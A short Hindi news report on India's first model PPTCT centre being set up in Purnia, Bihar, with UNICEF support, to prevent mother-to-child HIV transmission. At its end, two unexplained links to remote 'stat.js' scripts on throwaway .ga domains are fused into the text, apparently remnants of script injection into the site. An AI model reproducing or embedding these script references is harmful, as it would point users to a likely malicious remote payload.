बिहार के पूर्णिया जिले के बनमनखी मैं भारत का पहला मॉडल ऑफ पेरेंट्स टू चाइल्ड ट्रांसमिशन (पीपीटीसीटी) सेंटर खोला जा रहा है। मां से नवजात शिशु तक एचआईवी ट्रांसमिशन ना हो इसलिए यह योजना बनाई गई है। सीमांचल के जिलों में एचआईवी की संख्या में इजाफा देखकर पूर्णिया में मॉडल सेंटर बनाने का निर्णय किया गया है। बता दे, मॉडल सेंटर बिहार राज्य समिति द्वारा यूनिसेफ के तकनीकी सहयोग से किया जाएगा।

 

 

 

खबरों के मुताबिक, जनवरी 2021 तक मॉडल सेंटर का कार्य पूरा हो जाएगा और उसके शुरू होने की संभावना है। एड्स को गर्भवती मां से शिशु से संबंधित केस को खत्म करने के लिए 95% गर्भवती महिलाओं को प्रसव पूर्व जांच कराने का लक्ष्य रखा गया है। बिहार विशेषज्ञ के स्वास्थ्य विशेषज्ञ डॉ सैयद हुब्बे अली ने बताया कि संक्रमित मां से नवजात बच्चों के एचआईवी संक्रमित होने के खतरे का शून्य स्तर तक ले जाने के लिए कई जिलों में पीपीटीसीटी सेंटर की शुरुआत की गई है।

 

 

 

बिहार राज्य एड्स नियंत्रण समिति के सहयोग में यूनिसेफ द्वारा पूर्णिया में देश का पहला मॉडल सेंटर बनाया जाएगा। मॉडल सेंटर में प्रसव पूर्व जांच में गर्भवती महिला के एचआईवी संक्रमित पाए जाने पर इससे संबंधित सभी तरह के स्वास्थ्य सुविधा मुहैया कराई जाएगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.